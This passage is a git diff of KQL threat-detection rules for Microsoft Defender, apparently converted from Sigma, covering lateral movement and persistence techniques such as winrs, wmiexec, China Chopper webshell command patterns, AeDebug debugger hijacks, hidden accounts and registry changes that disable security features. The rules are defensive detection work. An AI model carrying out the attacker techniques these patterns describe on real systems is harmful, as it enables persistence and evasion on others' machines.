locally. +// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains "–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:")))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql index 572e0532..de812aaa 100644 --- a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql +++ b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql @@ -1,13 +1,13 @@ -// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-09-02 -// Level: medium -// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003 -// False Positives: -// - Legitimate event consumers -// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button - -DeviceImageLoadEvents +// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-09-02 +// Level: medium +// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate event consumers +// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button + +DeviceImageLoadEvents | where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql index 03ff0711..f6b6e93b 100644 --- a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql +++ b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql @@ -1,12 +1,12 @@ -// Title: Wmiexec Default Output File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-02 -// Level: critical -// Description: Detects the creation of the default output filename used by the wmiexec tool -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.execution, attack.t1047 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Wmiexec Default Output File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-02 +// Level: critical +// Description: Detects the creation of the default output filename used by the wmiexec tool +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.execution, attack.t1047 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$" \ No newline at end of file diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql index 6c6dcc17..c2418e3b 100644 --- a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql +++ b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql @@ -1,12 +1,12 @@ -// Title: Abuse of Service Permissions to Hide Services Via Set-Service -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-17 -// Level: high -// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 -// False Positives: -// - Rare intended use of hidden services - -DeviceProcessEvents +// Title: Abuse of Service Permissions to Hide Services Via Set-Service +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: high +// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 +// False Positives: +// - Rare intended use of hidden services + +DeviceProcessEvents | where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql index ed568d7c..8d091e01 100644 --- a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql +++ b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql @@ -1,10 +1,10 @@ -// Title: Activate Suppression of Windows Security Center Notifications -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Activate Suppression of Windows Security Center Notifications +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress" \ No newline at end of file diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql index e3f8d755..fcc2126a 100644 --- a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql +++ b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql @@ -1,12 +1,12 @@ -// Title: Add Debugger Entry To AeDebug For Persistence -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: medium -// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines - -DeviceRegistryEvents +// Title: Add Debugger Entry To AeDebug For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines + +DeviceRegistryEvents | where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p")) \ No newline at end of file diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql index 88024939..0dfded9b 100644 --- a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql +++ b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql @@ -1,12 +1,12 @@ -// Title: Add Debugger Entry To Hangs Key For Persistence -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - This value is not set by default but could be rarly used by administrators - -DeviceRegistryEvents +// Title: Add Debugger Entry To Hangs Key For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - This value is not set by default but could be rarly used by administrators + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger" \ No newline at end of file diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql index 8768d399..407fa6ed 100644 --- a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql +++ b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql @@ -1,10 +1,10 @@ -// Title: Add DisallowRun Execution to Registry -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect set DisallowRun to 1 to prevent user running specific computer program -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Add DisallowRun Execution to Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set DisallowRun to 1 to prevent user running specific computer program +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun" \ No newline at end of file diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql index 387f4a93..42f5a68d 100644 --- a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql +++ b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql @@ -1,12 +1,12 @@ -// Title: Allow RDP Remote Assistance Feature -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate use of the feature (alerts should be investigated either way) - -DeviceRegistryEvents +// Title: Allow RDP Remote Assistance Feature +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of the feature (alerts should be investigated either way) + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp" \ No newline at end of file diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql b/KQL/rules/Persistence/change_the_fax_dll.kql index 1ed01153..5ad43122 100644 --- a/KQL/rules/Persistence/change_the_fax_dll.kql +++ b/KQL/rules/Persistence/change_the_fax_dll.kql @@ -1,10 +1,10 @@ -// Title: Change the Fax Dll -// Author: frack113 -// Date: 2022-07-17 -// Level: high -// Description: Detect possible persistence using Fax DLL load when service restart -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Change the Fax Dll +// Author: frack113 +// Date: 2022-07-17 +// Level: high +// Description: Detect possible persistence using Fax DLL load when service restart +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll")) \ No newline at end of file diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql index 0a510014..cd03cc49 100644 --- a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql +++ b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql @@ -1,10 +1,10 @@ -// Title: Change User Account Associated with the FAX Service -// Author: frack113 -// Date: 2022-07-17 -// Level: high -// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Change User Account Associated with the FAX Service +// Author: frack113 +// Date: 2022-07-17 +// Level: high +// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService")) \ No newline at end of file diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql index c9f272f5..a9c4a33c 100644 --- a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql +++ b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql @@ -1,10 +1,10 @@ -// Title: Chopper Webshell Process Pattern -// Author: Florian Roth (Nextron Systems), MSTI (query) -// Date: 2022-10-01 -// Level: high -// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 - -DeviceProcessEvents +// Title: Chopper Webshell Process Pattern +// Author: Florian Roth (Nextron Systems), MSTI (query) +// Date: 2022-10-01 +// Level: high +// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 + +DeviceProcessEvents | where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql index e9c0a017..5d987340 100644 --- a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql +++ b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql @@ -1,12 +1,12 @@ -// Title: Chromium Browser Instance Executed With Custom Extension -// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) -// Date: 2022-06-19 -// Level: medium -// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1176.001 -// False Positives: -// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert - -DeviceProcessEvents +// Title: Chromium Browser Instance Executed With Custom Extension +// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) +// Date: 2022-06-19 +// Level: medium +// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1176.001 +// False Positives: +// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert + +DeviceProcessEvents | where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql index 474eef12..e2d1d762 100644 --- a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql +++ b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql @@ -1,12 +1,12 @@ -// Title: ClickOnce Trust Prompt Tampering -// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate internal requirements. - -DeviceRegistryEvents +// Title: ClickOnce Trust Prompt Tampering +// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate internal requirements. + +DeviceRegistryEvents | where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites") \ No newline at end of file diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/Persistence/com_hijack_via_sdclt.kql index b08432c8..548e999a 100644 --- a/KQL/rules/Persistence/com_hijack_via_sdclt.kql +++ b/KQL/rules/Persistence/com_hijack_via_sdclt.kql @@ -1,10 +1,10 @@ -// Title: COM Hijack via Sdclt -// Author: Omkar Gudhate -// Date: 2020-09-27 -// Level: high -// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548 - -DeviceRegistryEvents +// Title: COM Hijack via Sdclt +// Author: Omkar Gudhate +// Date: 2020-09-27 +// Level: high +// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548 + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql index 191ccce8..bffd61f0 100644 --- a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql +++ b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql @@ -1,10 +1,10 @@ -// Title: Communication To Uncommon Destination Ports -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-19 -// Level: medium -// Description: Detects programs that connect to uncommon destination ports -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.command-and-control, attack.t1571 - -DeviceNetworkEvents +// Title: Communication To Uncommon Destination Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: medium +// Description: Detects programs that connect to uncommon destination ports +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents | where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql index 17b2e4c6..4ee20b56 100644 --- a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql +++ b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql @@ -1,12 +1,12 @@ -// Title: CrashControl CrashDump Disabled -// Author: Tobias Michalski (Nextron Systems) -// Date: 2022-02-24 -// Level: medium -// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112 -// False Positives: -// - Legitimate disabling of crashdumps - -DeviceRegistryEvents +// Title: CrashControl CrashDump Disabled +// Author: Tobias Michalski (Nextron Systems) +// Date: 2022-02-24 +// Level: medium +// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112 +// False Positives: +// - Legitimate disabling of crashdumps + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl" \ No newline at end of file diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql index 318b3b95..a2864eb6 100644 --- a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql +++ b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql @@ -1,10 +1,10 @@ -// Title: Creation of a Local Hidden User Account by Registry -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-05-03 -// Level: high -// Description: Sysmon registry detection of a local hidden user account. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001 - -DeviceRegistryEvents +// Title: Creation of a Local Hidden User Account by Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-05-03 +// Level: high +// Description: Sysmon registry detection of a local hidden user account. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 + +DeviceRegistryEvents | where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$" \ No newline at end of file diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/Persistence/creation_of_a_local_user_account.kql index 2d44ba9d..27c7fb62 100644 --- a/KQL/rules/Persistence/creation_of_a_local_user_account.kql +++ b/KQL/rules/Persistence/creation_of_a_local_user_account.kql @@ -1,12 +1,12 @@ -// Title: Creation Of A Local User Account -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-06 -// Level: low -// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. -// MITRE Tactic: Persistence -// Tags: attack.t1136.001, attack.persistence -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Creation Of A Local User Account +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: low +// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. +// MITRE Tactic: Persistence +// Tags: attack.t1136.001, attack.persistence +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl") \ No newline at end of file diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql index a66f52c7..71d99a50 100644 --- a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql +++ b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql @@ -1,12 +1,12 @@ -// Title: Disable Internal Tools or Feature in Registry -// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec -// Date: 2022-03-18 -// Level: medium -// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate admin script - -DeviceRegistryEvents +// Title: Disable Internal Tools or Feature in Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD")) \ No newline at end of file diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql index e05e5ac6..a925bbff 100644 --- a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql +++ b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql @@ -1,10 +1,10 @@ -// Title: Disable Windows Security Center Notifications -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Disable Windows Security Center Notifications +// Author: frack113 +// 